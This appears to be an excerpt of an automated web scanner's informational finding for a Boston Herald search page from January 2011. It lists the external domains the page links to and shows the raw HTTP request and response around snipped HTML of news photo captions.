    <img id="197757" src="http://multimedia.heraldinteractive.com/images/20110126/stp/80ecf9_Firth_01262011.jpg" title="FILM ROYALTY: Colin Firth and Geoffrey Rush, from left, were both nominated for ‘The King’s Speech,’ which got 12 nods in all."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
d=1312041" title="Sorry seems to be the hardest word for Chuck Turner"
onclick="switchPhoto('197803');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197803" src="http://multimedia.heraldinteractive.com/images/20110126/stp/0537a7_mainturner01262011.jpg" title="NO REMORSE: Chuck Turner was found guilty of accepting a bribe, but Judge Douglas Woodlock’s three year prison sentence was largely influenced by Turner’s ‘failure to recognize and accept responsibility.’"
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
lumnists/view.bg?articleid=1312039" title="UConn booster, take a seat"
onclick="switchPhoto('197798');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197798" src="http://multimedia.heraldinteractive.com/images/20110126/stp/a89591_rburton012611.jpg" title="This 1997 photo shows Robert Burton in his Greenwich, Conn. office. Burton, a major benefactor to the University of Connecticut wants the school to return $3 million in donations."
alt="Bob Luckey/Greenwich Time" style="margin:0 2px" />
</a>
...[SNIP]...
bg?articleid=1312034" title="Glenn Beck, Betty White now comic heroes"
onclick="switchPhoto('197755');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197755" src="http://multimedia.heraldinteractive.com/images/20110126/stp/198eb7_Beck_01262011.jpg" title="SUPERSTAR TREATMENT: Thanks to Bluewater Comics, Glenn Beck now has his own comic book."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
bg?articleid=1312034" title="Glenn Beck, Betty White now comic heroes"
onclick="switchPhoto('197754');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197754" src="http://multimedia.heraldinteractive.com/images/20110126/stp/a15610_Betty_01262011.jpg" title="SUPERSTAR TREATMENT: Thanks to Bluewater Comics, Betty White now has her own comic book."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
bg?articleid=1312034" title="Glenn Beck, Betty White now comic heroes"
onclick="switchPhoto('197752');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197752" src="http://multimedia.heraldinteractive.com/images/20110126/stp/d89094_Fame_01262011.jpg" title="SUPERSTAR TREATMENT: Thanks to Bluewater Comics, Glee now has their own comic book."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1312032" title="Defiant Chuck Turner gets three years behind bars"
onclick="switchPhoto('197802');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197802" src="http://multimedia.heraldinteractive.com/images/20110126/stp/a12817_turnerb01262011.jpg" title="SO LONG: Disgraced former Boston City Councilor Chuck Turner yesterday leaves U.S. District Court, where Judge Douglas P. Woodlock sentenced him to three years in prison for accepting a bribe."
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
="Chandler Travis Philharmonic rocks music’s comedic boundaries"
onclick="switchPhoto('197758');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197758" src="http://multimedia.heraldinteractive.com/images/20110126/stp/f812e5_Chandler_01262011.jpg" title="CHANGING CLOTHES: The wildly garbed Chandler Travis Philharmonic will be dressed more sedately Thursday at Johnny D’s."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1312027" title="Stone Flower dresses for Hub success"
onclick="switchPhoto('197750');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197750" src="http://multimedia.heraldinteractive.com/images/20110126/stp/178947_Stone_01272011.jpg" title="WALLET FRIENDLY: Stone Flower, which carries one-size party dresses aimed at young women, plans to open a store in the Faneuil Hall Marketplace."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
ainment/food_dining/food/view.bg?articleid=1312009" title="Cheese wiz"
onclick="switchPhoto('197832');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197832" src="http://multimedia.heraldinteractive.com/images/20110126/stp/be6d4c_cheese012611.jpg" title="Cheese Monger David Robinson, right, shows Herald writer Jed Gottlieb how to clean blue cheese at South End Formaggio on Shawmut Ave. in the South End."
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
ew.bg?articleid=1311998" title="‘Defenders’ go on offense"
onclick="switchPhoto('197746');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197746" src="http://multimedia.heraldinteractive.com/images/20110125/stp/a9f2ba_Bully_01272011.jpg" title="TAKING ACTION: Edinson Valdez displays his ‘Irving Defender’ anti-bullying wristband."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
tle="Celtics deal Cavs 18th straight loss as Kendrick Perkins returns"
onclick="switchPhoto('197736');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197736" src="http://multimedia.heraldinteractive.com/images/20110125/stp/1c641f_Perk_01262011.jpg" title="PERKED UP: Kendrick Perkins acknowledged fans as they cheered on his first quarter return to action
during the Celtics’ 112-95 win over the Cavs at TD Garden."
alt="Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
=1311966" title="Oscar oversights include some Hollywood heavyweights"
onclick="switchPhoto('197720');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197720" src="http://multimedia.heraldinteractive.com/images/20110125/stp/bb27d3_41de89_ltpdvd20101205.jpg" title="Leonardo DiCaprio in ‘Inception.’ "
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
g?articleid=1311965" title="Chuck Turner sentenced to 3 years in jail"
onclick="switchPhoto('197727');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197727" src="http://multimedia.heraldinteractive.com/images/20110125/stp/151c52_012511chuckjw02.jpg" title="Chuck Turner arrives at the U.S. District Court in Boston today for his sentencing.
"
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
g?articleid=1311964" title="Chuck Turner sentenced to 3 years in jail"
onclick="switchPhoto('197719');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197719" src="http://multimedia.heraldinteractive.com/images/20110125/stp/6e56b2_ltp092309turnerar01.jpg" title="Former Boston City Councilor Chuck Turner was sentenced to three years in jail today. "
alt="Angela Rowlings" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1311878" title="Party time in Boston for Oscar nominations"
onclick="switchPhoto('197658');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197658" src="http://multimedia.heraldinteractive.com/images/20110125/stp/a6cabb_ltpOscParty012511.jpg" title="From left to right: Erica McDermott, Melissa McMeekin and Kate O’Brien are seen at the premier of ‘The Fighter’ at the Patriot Cinemas in Hingham."
alt="Stuart Cahill" style="margin:0 2px" />
</a>
...[SNIP]...
rticleid=1311858" title="Cubans fast becoming the new stars in ballet"
onclick="switchPhoto('197635');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197635" src="http://multimedia.heraldinteractive.com/images/20110125/stp/795144_cuban.jpg" title="In this undated publicity image released by the Boston Ballet, Cuban dancers Nelson Madrigal, left, and his wife Lorna Feijoo perform in ‘The Sleeping Beauty’ at the Wang Center for the Performing Arts in Boston. "
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
ew.bg?articleid=1311828" title="Wes Welker: I regret press conference"
onclick="switchPhoto('197625');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197625" src="http://multimedia.heraldinteractive.com/images/20110125/stp/363d09_wwelker012511.jpg" title="Patriots wide receiver Wes Welker warms up before an NFL football game in the AFC playoffs against the New York Jets in Foxboro on Jan. 16, 2011. "
alt="AP (File)" style="margin:0 2px" />
</a>
...[SNIP]...
11803" title="We Hear: Jay Leno, Josh Beckett, Zona Jones and more..."
onclick="switchPhoto('197606');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197606" src="http://multimedia.heraldinteractive.com/images/20110125/stp/d33d45_jayl_01252011.jpg" title="Jay Leno"
alt="Herald file" style="margin:0 2px" />
</a>
...[SNIP]...
al/view.bg?articleid=1311802" title="Water pipe break routs residents"
onclick="switchPhoto('197594');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197594" src="http://multimedia.heraldinteractive.com/images/20110125/stp/a3a915_evac_01252011.jpg" title="Residents of 660 Washington Street (The Archstone Building) in Downtown Crossing were evacuated due to a water main break in their building."
alt="Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1311794" title="Homeless woman shuns shelter as temps turn deadly"
onclick="switchPhoto('197654');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197654" src="http://multimedia.heraldinteractive.com/images/20110125/stp/0f1e24_ltp012411homelessms01.jpg" title=" Susan Bakerjones, a homeless woman who refuses to seek a shelter, looks out from the tent she calls home during Monday’s bitter cold. "
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1311794" title="Homeless woman shuns shelter as temps turn deadly"
onclick="switchPhoto('197569');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197569" src="http://multimedia.heraldinteractive.com/images/20110124/stp/a26b54_home_01252011.jpg" title="Susan Bakerjones, a homeless woman who refuses to seek a shelter, lives in a tent year round, even when it is bitter cold. "
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
usiness/general/view.bg?articleid=1311786" title="Vertex OKs Hub deal"
onclick="switchPhoto('197576');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197576" src="http://multimedia.heraldinteractive.com/images/20110125/stp/07fb8b_vertex_01252011.jpg" title=""
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
id=1311772" title="BC’s Mark Herzlich aims to get a shot at NFL"
onclick="switchPhoto('197586');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197586" src="http://multimedia.heraldinteractive.com/images/20110125/stp/8f4487_mark_01252011.jpg" title="
SEEKING NEW HEIGHTS: Former Boston College linebacker Mark Herzlich is taking part in Senior Bowl activities this week in Mobile, Ala., with an eye on a shot at the NFL."
alt="John Wilcox" style="margin:0 2px" />
</a>
...[SNIP]...
al/view.bg?articleid=1311770" title="Tragedy could boost organ donors"
onclick="switchPhoto('197567');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197567" src="http://multimedia.heraldinteractive.com/images/20110124/stp/97d735_coff_01252011.jpg" title="HER LEGACY: Mourners load the casket of Christina Taylor Green into a hearse after her funeral earlier this
month in Tucson, Ariz. Her corneas were donated after she was killed in a shooting spree."
alt="AP (file)" style="margin:0 2px" />
</a>
...[SNIP]...
ss/general/view.bg?articleid=1311768" title="Eateries eye later close"
onclick="switchPhoto('197578');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197578" src="http://multimedia.heraldinteractive.com/images/20110125/stp/5a949a_tresca_01262011.jpg" title="CLOSING TIME: Massimo Tiberi, general manager
of Tresca in Boston’s North End, says co-owner Ray
Bourque wants to keep the eatery open until 1 a.m."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
articleid=1311767" title="New Kids bringing the right stuff to Fenway"
onclick="switchPhoto('197593');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197593" src="http://multimedia.heraldinteractive.com/images/20110125/stp/c7e9f8_newkids_01252011.jpg" title="BIG HITTERS: Boston’s own New Kids on the Block, above, will play at Fenway Park on June 11."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
ust 16, Canada’s Nikki Yanofsky keeps pretty impressive company"
onclick="switchPhoto('197592');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197592" src="http://multimedia.heraldinteractive.com/images/20110125/stp/4ea241_music_01252011.jpg" title="Nikki Yanofsky."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
ment/arts_culture/view.bg?articleid=1311759" title="Naughty by nature"
onclick="switchPhoto('197582');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197582" src="http://multimedia.heraldinteractive.com/images/20110125/stp/052e14_glover_01252011.jpg" title="GETTING SCHOOLED:
Comedian Danny Glover,above , stars on ‘Community’."
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
"/news/regional/view.bg?articleid=1311752" title="Drill, baby, drill!"
onclick="switchPhoto('197568');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197568" src="http://multimedia.heraldinteractive.com/images/20110124/stp/9d98c9_drill_01252011.jpg" title="NOTHING TO SEE: Police officers chat with officials from Beth Israel Deaconess Medical Center yesterday about a drill."
alt="Matthew West" style="margin:0 2px" />
</a>
...[SNIP]...
?articleid=1311748" title="Prosecutors: Driver drunk in I-93 rollover"
onclick="switchPhoto('197565');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197565" src="http://multimedia.heraldinteractive.com/images/20110124/stp/08bb48_court_01252011.jpg" title="‘GRIEVOUS’: Patrick Fay, 24, of Holbrook appears in
Dorchester District Court yesterday on charges of drunken driving and fleeing the scene of a crash."
alt="Ted Fitzgerald" style="margin:0 2px" />
</a>
...[SNIP]...
l/view.bg?articleid=1311738" title="Elderly bicyclist killed in crash"
onclick="switchPhoto('197570');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197570" src="http://multimedia.heraldinteractive.com/images/20110124/stp/f00c74_bike_01252011.jpg" title="Boston Police investigate a fatal bicyclist accident on Herald Street, near the corners of Tremont and Arlington."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
311725" title="Celtics C Shaquille O’Neal ruled out for Tuesday"
onclick="switchPhoto('197561');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197561" src="http://multimedia.heraldinteractive.com/images/20110124/stp/470a99_shaq_01242011.jpg" title="Shaquille O’Neal."
alt="Christopher Evans" style="margin:0 2px" />
</a>
...[SNIP]...
id=1311629" title="MBTA bus driver pleads not guilty to driving drunk"
onclick="switchPhoto('197505');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197505" src="http://multimedia.heraldinteractive.com/images/20110124/stp/7a4442_f21bb4_Mccarthy_01232011.jpg" title="John McCarthy "
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
" title="Treasurer Steve Grossman confirms Tim Cahill campaign probe"
onclick="switchPhoto('197488');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197488" src="http://multimedia.heraldinteractive.com/images/20110124/stp/fc0641_031610cahillmg01.jpg" title="Tim Cahill"
alt="Mark Garfinkel (file)" style="margin:0 2px" />
</a>
...[SNIP]...
rticleid=1311595" title="City bicyclist fatally struck during commute"
onclick="switchPhoto('197503');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197503" src="http://multimedia.heraldinteractive.com/images/20110124/stp/f6fd9b_ltpBikesceneA012411.jpg" title="Boston Police investigate a fatal bicyclist accident on Herald Street, near the corners of Tremont and Arlington streets this morning."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
l/view.bg?articleid=1311585" title="Sub-zero temps wreak havoc with T"
onclick="switchPhoto('197481');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197481" src="http://multimedia.heraldinteractive.com/images/20110124/stp/439ffc_ltpColdpeopleA012411.jpg" title="Pedestrians walk towards Federal Street in the bitter cold this morning."
alt="Matt Stone" style="margin:0 2px" />
</a>
...[SNIP]...
.bg?articleid=1311581" title="Dustin Pedroia hangs with the big dawgs"
onclick="switchPhoto('197478');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197478" src="http://multimedia.heraldinteractive.com/images/20110124/stp/c9d99f_pedroia012411.jpg" title="Dustin Pedroia continues his sponsorship deal as Sullivan Tire spokesperson. He filmed a commercial Wednesday with ‘Misty.’"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
eid=1311555" title="Patriots fan Amy Poehler lives in a house divided"
onclick="switchPhoto('197465');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197465" src="http://multimedia.heraldinteractive.com/images/20110124/stp/a0920e_amy_01242011.jpg" title="Amy Poehler."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
itle="We Hear: Josh Beckett, Lamar Odom, Khloe Kardashian and more..."
onclick="switchPhoto('197447');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197447" src="http://multimedia.heraldinteractive.com/images/20110123/stp/ccc6fe_josh_01242011.jpg" title="Josh Beckett."
alt="AP" style="margin:0 2px" />
</a>
...[SNIP]...
"Tracked Down: Maria Menounos, John Henry, Martha Coakley and more..."
onclick="switchPhoto('197446');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197446" src="http://multimedia.heraldinteractive.com/images/20110123/stp/d5e151_henry_01242011.jpg" title="John Henry and his wife, Linda, left, and Big Brothers Big Sisters
CEO Wendy Foster attend the agency’s Big 12 Gala."
alt="John Kreis" style="margin:0 2px" />
</a>
...[SNIP]...
general/view.bg?articleid=1311545" title="‘Being’ himself"
onclick="switchPhoto('197452');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197452" src="http://multimedia.heraldinteractive.com/images/20110123/stp/82de90_vamp_01242011.jpg" title="BLOODY GOOD SHOW: Sam Witwer says there’s a lot of
potential in the American remake of BBC’s ‘Being Human.’"
alt="" style="margin:0 2px" />
</a>
...[SNIP]...
iew.bg?articleid=1311531" title="BC’s Corey Raji sitting pretty"
onclick="switchPhoto('197462');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197462" src="http://multimedia.heraldinteractive.com/images/20110124/stp/8ba7b4_raji_01242011.jpg" title="
FORWARD MARCH: Boston College senior Corey Raji is averaging career highs in points and rebounds despite losing his starting job earlier in the season."
alt="Matthew Healey" style="margin:0 2px" />
</a>
...[SNIP]...
"/news/regional/view.bg?articleid=1311518" title="Cold, hard truth..."
onclick="switchPhoto('197443');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197443" src="http://multimedia.heraldinteractive.com/images/20110123/stp/7de6bf_walk_01242011.jpg" title="BONE-CHILLING: Bundled-up walkers make their way along the beach off Day Boulevard  in South Boston yesterday.
"
alt="Matthew Healey" style="margin:0 2px" />
</a>
...[SNIP]...
view.bg?articleid=1311514" title="Big hit sends Savard home for tests"
onclick="switchPhoto('197460');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="197460" src="http://multimedia.heraldinteractive.com/images/20110124/stp/2dc50c_sav_01242011.jpg" title="Marc Savard."
alt="Stuart Cahill" style="margin:0 2px" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
<h2><a href="http://www.collegeanduniversity.net/herald/">Education Channel</a>
...[SNIP]...
<h2><a href="http://www.uclick.com/client/boh/sudoc/" target="_new">Play Sudoku!</a>
...[SNIP]...
<span style="bold"><a href="http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=" target="_new">Jobs with Herald Media</a>
...[SNIP]...
<div style="padding:15px; text-align:center;">
<a href="http://www.bostonheraldineducation.com" target="_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif" alt="N.I.E." /></a>
<a href="http://bostonheraldnie.newspaperdirect.com" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif" alt="Smart Edition" /></a>
<a href="http://www.massliteracy.org" target=_new"><img src="http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif" alt="Mass Literacy Foundation" /></a>
...[SNIP]...
<br />No portion of BostonHerald.com or its content may be reproduced without the owner's written permission. <a href="http://www.heraldmedia.com/privacy.html">Privacy Commitment</a>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
<noscript>
<a href="http://www.quantcast.com/p-352ZWwG8I7OVQ" target="_blank"><img
src="http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif" style="display:
none;" border="0" height="1" width="1" alt="Quantcast"/></a>
...[SNIP]...

17.298. http://www.bostonherald.com/search/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bostonherald.com
Path:	/search/

Issue detail

The page was loaded from a URL containing a query string:

http://www.bostonherald.com/search/?topic=Rep.+James+Vallee&searchSite=recent

The response contains the following links to other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DRep.%2BJames%2BVallee%26searchSite%3Drecent&c5=&c6=&c15=
http://bostonherald.boocoo.com/
http://bostonheraldnie.newspaperdirect.com/
http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif
http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif
http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png
http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png
http://cache.heraldinteractive.com/images/version5.0/site_images/mlf.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nie.gif
http://cache.heraldinteractive.com/images/version5.0/site_images/nieSmart.gif
http://cache.heraldinteractive.com/js/ajax.js?nc=1
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://feeds.feedburner.com/bostonherald/search/
http://hotjobs.yahoo.com/job-search;_ylc=X3oDMTFka204b2luBF9TAzM5NjUxMTI1MQRwYXJ0bmVyA2Jvc3RvbmhlcmFsZARzcmMDY29uc29sZQ--?partner=bostonherald&kw=bostonherald.com&locations=Boston%2C+MA&metro_search_proxy=1&metro_search=1&industry=
http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg
http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://pixel.quantserve.com/pixel/p-352ZWwG8I7OVQ.gif
http://twitter.com/bostonherald
http://www.bostonheraldineducation.com/
http://www.carfind.com/
http://www.collegeanduniversity.net/herald/
http://www.facebook.com/pages/BostonHeraldcom/197211981599
http://www.heraldmedia.com/privacy.html
http://www.homefind.com/
http://www.legacy.com/obituaries/bostonherald/
http://www.massliteracy.org/
http://www.quantcast.com/p-352ZWwG8I7OVQ
http://www.uclick.com/client/boh/sudoc/

Request

GET /search/?topic=Rep.+James+Vallee&searchSite=recent HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:07:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37360

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   
...[SNIP]...

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</style>

   <link rel="alternate" title="Site Search - - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/search/" type="application/rss+xml">
<script type="text/javascript" language="JavaScript">
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=6151562&c3=www.bostonherald.com&c4=www.bostonherald.com%2Fsearch%2F%3Ftopic%3DRep.%2BJames%2BVallee%26searchSite%3Drecent&c5=&c6=&c15=" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<a href="/"><img src="http://cache.heraldinteractive.com/images/siteImages/edge/edgeBlank.gif" class="headerLogoSpacer"></a>
...[SNIP]...
<li id="obits" class="tab" onmouseover="this.className=this.className+'Hover'; return false;" onmouseout="this.className=this.className.replace('Hover',''); " onclick=""><a href="http://www.legacy.com/obituaries/bostonherald/">Obituaries</a>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Features <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Features"><!--[if gt IE 6]>
...[SNIP]...
<a class="alt" href="javascript:void(0);">Classifieds <img src="http://cache.heraldinteractive.com/images/siteImages/icons/arrow_drop_down.png" alt="Classifieds"><!--[if gt IE 6]>
...[SNIP]...
<div><a href="http://bostonherald.boocoo.com/">Boocoo Auctions</a>
...[SNIP]...
<div><a href="http://www.homefind.com">Homefind</a>
...[SNIP]...
<div><a href="http://www.carfind.com">Carfind</a>
...[SNIP]...
<div id="followUs" class="dateBarItem">

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" style="font-weight:bold" target="_blank">Follow Us</a>

<a href="http://www.facebook.com/pages/BostonHeraldcom/197211981599" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/facebook.png" />
</a>

<a href="http://twitter.com/bostonherald" target="_blank">
<img class="icon" src="http://cache.heraldinteractive.com/images/siteImages/icons/social_media/16px/twitter.png" />
</a>
...[SNIP]...
</h2>
<img src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" alt="Boston Herald" />
<div class="byline">
...[SNIP]...
<div class="icons">

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniComments.gif" alt="Comments"style=" margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665&format=comments">
...[SNIP]...
</a>  

<img class="tabMediaImage" src="http://cache.heraldinteractive.com/images/siteImages/icons/iconMiniSidebar.gif" alt="More Information" style="margin:0 2px 0 0;"><a href="/news/politics/view.bg?articleid=1312665">
...[SNIP]...
<a id="trackMainImage_href" href="/news/politics/view.bg?articleid=1312665">
<img id="trackMainImage" class="mainImage" src="http://multimedia.heraldinteractive.com/images/20110128/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo." alt="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo.">
</a>
...[SNIP]...
itics/view.bg?articleid=1312665" title="Speaker DeLeo shakes up House"
onclick="switchPhoto('198223');
pageTracker._trackPageview('/search/photobox/index.bg?term='); return false; ">
    <img id="198223" src="http://multimedia.heraldinteractive.com/images/20110128/stp/fbd318_ltpDeleoA012811.jpg" title="House Speaker Robert DeLeo is seen in this Tuesday, August 3, 2010 file photo."
alt="Nancy Lane" style="margin:0 2px" />
</a>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
<h2><a href="http://www.carfind.com/">Carfind</a>
...[SNIP]...
<h2><a href="http://www.homefind.com/">Homefind</a>
...[SNIP]...
